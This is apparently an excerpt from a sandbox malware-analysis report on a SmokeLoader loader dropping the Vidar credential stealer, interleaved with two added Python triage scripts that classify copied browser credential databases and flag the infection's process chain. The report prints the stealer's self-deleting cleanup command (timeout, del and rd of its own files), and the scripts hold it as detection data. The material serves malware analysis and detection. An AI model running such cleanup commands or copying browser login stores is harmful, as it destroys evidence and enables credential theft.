Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, sqls[1].dll.12.dr, nss3[1].dll.12.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.12.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: 5876.exe, 00000007.00000003.1760839883.0000000002C8B000.00000004.00000800.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1744609509.0000000002C75000.00000004.00000800.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1743544115.0000000002C94000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2250873454.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2250873454.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2233073953.00000000009D6000.00000004.00000020.00020000.00000000.sdmp, GIEBAE.12.dr, BFIIID.12.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.12.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.12.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
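The schema strings above tell you what was copied. `password_notes` together with `logins` is the Chromium "Login Data" database; it appears here in 5876.exe's memory and in the dropped files GIEBAE and BFIIID, i.e. the stealer copied the victim's saved-password store under random names. The `metaData` table quoted from softokn3 is the schema NSS uses for Firefox's key4.db. The following triage helper is an added example (mine, not from the report or from either malware family): it checks the SQLite magic, opens the file read-only, and matches the table set in sqlite_master against a small signature table. The sample files are constructed in a temp directory from the schemas quoted above plus a minimal `logins` table; the signatures other than those two (Chromium Cookies and Web Data, Firefox cookies.sqlite, key4.db's `nssPrivate`) are from my own knowledge of those profile files, not from this page.

```python
"""Classify SQLite files copied out of browser profiles (added example).

Constructed sample files are built in a temp directory from the schema
strings quoted in this report; no real profile data is read or decrypted.
"""
import os
import sqlite3
import tempfile
from typing import Dict, List, Set, Tuple

SQLITE_MAGIC = b"SQLite format 3\x00"  # first 16 bytes of every SQLite 3 file

# Table sets that identify common browser stores (Chromium and Firefox/NSS).
SIGNATURES: Dict[str, Set[str]] = {
    "chromium_login_data": {"logins", "password_notes"},
    "chromium_cookies": {"cookies", "meta"},
    "chromium_web_data": {"autofill", "credit_cards"},
    "firefox_cookies": {"moz_cookies"},
    "nss_key4_db": {"metaData", "nssPrivate"},
}


def table_names(path: str) -> Set[str]:
    """Read table names from sqlite_master without modifying the evidence file."""
    con = sqlite3.connect(f"file:{path}?mode=ro", uri=True)
    try:
        return {r[0] for r in con.execute("SELECT name FROM sqlite_master WHERE type='table'")}
    finally:
        con.close()


def classify_sqlite(path: str) -> str:
    with open(path, "rb") as fh:
        if fh.read(16) != SQLITE_MAGIC:
            return "not_sqlite"
    tables = table_names(path)
    # Prefer the most specific signature (largest table set fully present).
    hits: List[Tuple[int, str]] = [(len(sig), kind) for kind, sig in SIGNATURES.items() if sig <= tables]
    return max(hits)[1] if hits else "unknown_sqlite"


def login_count(path: str) -> int:
    """Number of saved credentials in a Chromium Login Data copy (what the victim lost)."""
    con = sqlite3.connect(f"file:{path}?mode=ro", uri=True)
    try:
        return con.execute("SELECT COUNT(*) FROM logins").fetchone()[0]
    finally:
        con.close()


def summarize(path: str) -> Dict[str, object]:
    kind = classify_sqlite(path)
    return {"kind": kind, "logins": login_count(path) if kind == "chromium_login_data" else None}


def build_constructed_samples(dirpath: str) -> Dict[str, str]:
    """Write constructed stand-ins for the dropped files; names follow the report's GIEBAE style."""
    login = os.path.join(dirpath, "GIEBAE")
    con = sqlite3.connect(login)
    con.executescript("""
        CREATE TABLE logins (id INTEGER PRIMARY KEY, origin_url VARCHAR NOT NULL,
                             username_value VARCHAR, password_value BLOB);
        CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT,
            parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE
            DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB,
            date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        INSERT INTO logins VALUES (1, 'https://example.test/login', 'alice', X'763130');
        INSERT INTO logins VALUES (2, 'https://mail.example.test/', 'bob', X'763130');
    """)
    con.commit()
    con.close()
    key4 = os.path.join(dirpath, "key4.db")  # constructed NSS key store, schema as quoted above
    con = sqlite3.connect(key4)
    con.executescript("""
        CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
        CREATE TABLE nssPrivate (id PRIMARY KEY UNIQUE ON CONFLICT ABORT, a0, a1);
    """)
    con.commit()
    con.close()
    junk = os.path.join(dirpath, "junk.bin")  # constructed non-database drop
    with open(junk, "wb") as fh:
        fh.write(b"not a database")
    return {"GIEBAE": login, "key4.db": key4, "junk.bin": junk}


def run_demo() -> Dict[str, Dict[str, object]]:
    work = tempfile.mkdtemp(prefix="stealer-drops-")
    return {name: summarize(path) for name, path in build_constructed_samples(work).items()}


if __name__ == "__main__":
    for name, info in run_demo().items():
        print(f"{name}: {info['kind']}", f"({info['logins']} logins)" if info["logins"] is not None else "")
```

Point `summarize()` at the real GIEBAE/BFIIID files recovered from the sandbox to confirm they are Login Data copies and to count how many credentials were exposed; the password blobs themselves stay DPAPI-encrypted in the copy, and the stealer decrypts them on the victim host with the user's own key, which is why the copy is already as damaging as the original.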
Source: xvJv1BpknZ.exe Virustotal: Detection: 34%
Source: unknown Process created: C:\Users\user\Desktop\xvJv1BpknZ.exe "C:\Users\user\Desktop\xvJv1BpknZ.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\etrtabd C:\Users\user\AppData\Roaming\etrtabd
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\5876.exe C:\Users\user\AppData\Local\Temp\5876.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\EE6.exe C:\Users\user\AppData\Local\Temp\EE6.exe
Source: C:\Users\user\AppData\Local\Temp\EE6.exe Process created: C:\Users\user\AppData\Local\Temp\katDDA4.tmp C:\Users\user\AppData\Local\Temp\katDDA4.tmp
Source: C:\Users\user\AppData\Local\Temp\5876.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7992 -s 468
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katDDA4.tmp" & rd /s /q "C:\ProgramData\FBGIDHCAAKEB" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
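The process list above is the whole infection chain in one place: xvJv1BpknZ.exe (SmokeLoader) injects into explorer.exe, explorer.exe then drops and starts 5876.exe and EE6.exe from %TEMP% (the hex-style names are this sample's drop naming), EE6.exe starts katDDA4.tmp (the Vidar payload), and katDDA4.tmp finishes with `cmd.exe /c timeout /t 10 & del /f /q <own path> & rd /s /q C:\ProgramData\FBGIDHCAAKEB & exit`, which removes both the payload and its working directory after ten seconds. The extensionless copy C:\Users\user\AppData\Roaming\etrtabd is SmokeLoader's persistence copy, and WerFault.exe -p 7992 shows that 5876.exe crashed during the run. The script below is an added example (mine, not Joe Sandbox's) that rebuilds that tree from constructed process-creation records and flags each of those behaviours. Image paths and command lines are exactly those listed above; PIDs are invented except 7992, which the report gives for 5876.exe; the "short hex basename" test is a heuristic taken from this sample's drop names.

```python
"""Triage of the process chain listed above (added example; not Joe Sandbox code).

Records are constructed from the report's "Process created" lines: image
paths and command lines are the ones shown there, PIDs are invented except
7992, which the report gives for 5876.exe in the WerFault command line.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Sandbox user profile; production code would resolve %TEMP% / %APPDATA% per user.
TEMP = r"C:\Users\user\AppData\Local\Temp"
ROAMING = r"C:\Users\user\AppData\Roaming"

EVENTS: List[Tuple[int, int, str, str]] = [  # (pid, ppid, image, command line)
    (100, 1, r"C:\Users\user\Desktop\xvJv1BpknZ.exe", r'"C:\Users\user\Desktop\xvJv1BpknZ.exe"'),
    (200, 1, r"C:\Windows\explorer.exe", r"C:\Windows\explorer.exe"),
    (7992, 200, r"C:\Users\user\AppData\Local\Temp\5876.exe", r"C:\Users\user\AppData\Local\Temp\5876.exe"),
    (400, 200, r"C:\Users\user\AppData\Local\Temp\EE6.exe", r"C:\Users\user\AppData\Local\Temp\EE6.exe"),
    (500, 400, r"C:\Users\user\AppData\Local\Temp\katDDA4.tmp", r"C:\Users\user\AppData\Local\Temp\katDDA4.tmp"),
    (600, 500, r"C:\Windows\SysWOW64\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katDDA4.tmp" & rd /s /q "C:\ProgramData\FBGIDHCAAKEB" & exit'),
    (700, 600, r"C:\Windows\SysWOW64\timeout.exe", r"timeout /t 10"),
    (800, 1, r"C:\Users\user\AppData\Roaming\etrtabd", r"C:\Users\user\AppData\Roaming\etrtabd"),
    (900, 7992, r"C:\Windows\SysWOW64\WerFault.exe", r"C:\Windows\SysWOW64\WerFault.exe -u -p 7992 -s 468"),
]

SELF_DELETE = re.compile(r'timeout\s+/t\s+(\d+)\s*&\s*del\s+/f\s+/q\s+"([^"]+)"', re.I)
RD_DIR = re.compile(r'rd\s+/s\s+/q\s+"([^"]+)"', re.I)
# Heuristic from this sample's drop names (5876.exe, EE6.exe): short hex basenames.
HEX_EXE = re.compile(r"^[0-9A-F]{3,4}\.exe$", re.I)


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass
class Finding:
    rule: str
    pid: int
    detail: str


def under(path: str, folder: str) -> bool:
    return path.lower().startswith(folder.lower() + "\\")


def analyze(events: List[Tuple[int, int, str, str]]) -> List[Finding]:
    procs: Dict[int, Proc] = {pid: Proc(pid, ppid, img, cmd) for pid, ppid, img, cmd in events}
    findings: List[Finding] = []
    for p in procs.values():
        parent = procs.get(p.ppid)
        name = ntpath.basename(p.image).lower()
        # 1. explorer.exe starting a short hex-named EXE from %TEMP%: the injected
        #    loader dropping and running its payloads through a trusted process.
        if parent and ntpath.basename(parent.image).lower() == "explorer.exe" \
                and under(p.image, TEMP) and HEX_EXE.match(ntpath.basename(p.image)):
            findings.append(Finding("explorer_spawns_temp_hexname", p.pid, p.image))
        # 2. cmd.exe /c timeout ... & del "<parent image>": delayed self-deletion.
        if name == "cmd.exe" and parent:
            m = SELF_DELETE.search(p.cmdline)
            if m and m.group(2).lower() == parent.image.lower():
                detail = f"deletes parent {parent.image} after {m.group(1)}s"
                d = RD_DIR.search(p.cmdline)
                if d:
                    detail += f"; removes working dir {d.group(1)}"
                findings.append(Finding("delayed_self_delete", p.pid, detail))
        # 3. extensionless image under %APPDATA%\Roaming executed directly (persistence copy).
        if under(p.image, ROAMING) and "." not in ntpath.basename(p.image):
            findings.append(Finding("extensionless_exe_in_roaming", p.pid, p.image))
        # 4. WerFault attached (-p <pid>) to a process in this tree: a payload crashed.
        if name == "werfault.exe":
            m = re.search(r"-p\s+(\d+)", p.cmdline)
            if m and int(m.group(1)) in procs:
                crashed = procs[int(m.group(1))]
                findings.append(Finding("payload_crash", crashed.pid, crashed.image))
    return findings


def render_tree(events: List[Tuple[int, int, str, str]]) -> List[str]:
    """Indented process tree; roots are processes whose parent is not in the record set."""
    procs = {pid: Proc(pid, ppid, img, cmd) for pid, ppid, img, cmd in events}
    lines: List[str] = []

    def walk(pid: int, depth: int) -> None:
        lines.append("  " * depth + f"{ntpath.basename(procs[pid].image)} (pid {pid})")
        for child in sorted(q.pid for q in procs.values() if q.ppid == pid):
            walk(child, depth + 1)

    for root in sorted(p.pid for p in procs.values() if p.ppid not in procs):
        walk(root, 0)
    return lines


if __name__ == "__main__":
    print("\n".join(render_tree(EVENTS)))
    for f in analyze(EVENTS):
        print(f"[{f.rule}] pid {f.pid}: {f.detail}")
```

Rule 2 is the one worth keeping as a standing detection: a cmd.exe whose `del` target equals its parent's image path is rare in legitimate software and does not depend on sample-specific names. Rules 1 and 3 encode this sample's naming and are best treated as hunting queries rather than alerts.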
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: mfsrcsnk.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.internal.shell.broker.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\etrtabd Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\etrtabd Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\etrtabd Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\EE6.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\EE6.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\EE6.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\EE6.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\EE6.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: Binary string: mozglue.pdbP source: katDDA4.tmp, 0000000C.00000002.2589136080.000000006E6CD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.12.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.12.dr, freebl3.dll.12.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.12.dr, freebl3.dll.12.dr
Source: Binary string: nss3.pdb@ source: katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, nss3[1].dll.12.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.12.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.12.dr, vcruntime140.dll.12.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.12.dr, msvcp140[1].dll.12.dr
Source: Binary string: nss3.pdb source: katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, nss3[1].dll.12.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr
Source: Binary string: mozglue.pdb source: katDDA4.tmp, 0000000C.00000002.2589136080.000000006E6CD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.12.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.12.dr

Data Obfuscation

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Unpacked PE file: 0.2.xvJv1BpknZ.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\etrtabd Unpacked PE file: 6.2.etrtabd.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\5876.exe Unpacked PE file: 7.2.5876.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\5876.exe Unpacked PE file: 7.2.5876.exe.400000.0.unpack
Source: sqls[1].dll.12.dr Static PE information: section name: .00cfg
Source: freebl3.dll.12.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.12.dr Static PE information: section name: .00cfg
Source: mozglue.dll.12.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.12.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.12.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.12.dr Static PE information: section name: .didat
Source: nss3.dll.12.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.12.dr Static PE information: section name: .00cfg
Source: softokn3.dll.12.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.12.dr Static PE information: section name: .00cfg
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_00402CD7 push cs; retf 0_2_00402CD8
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_00401EA7 push 0000000Eh; retf 0038h 0_2_00401EB6
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_004033B6 push eax; ret 0_2_00403419
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_02111F0E push 0000000Eh; retf 0038h 0_2_02111F1D
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_02112D3E push cs; retf 0_2_02112D3F
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_02153622 push edx; retf 0_2_02153626
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_0215795A push 0000000Eh; retf 0038h 0_2_02157969
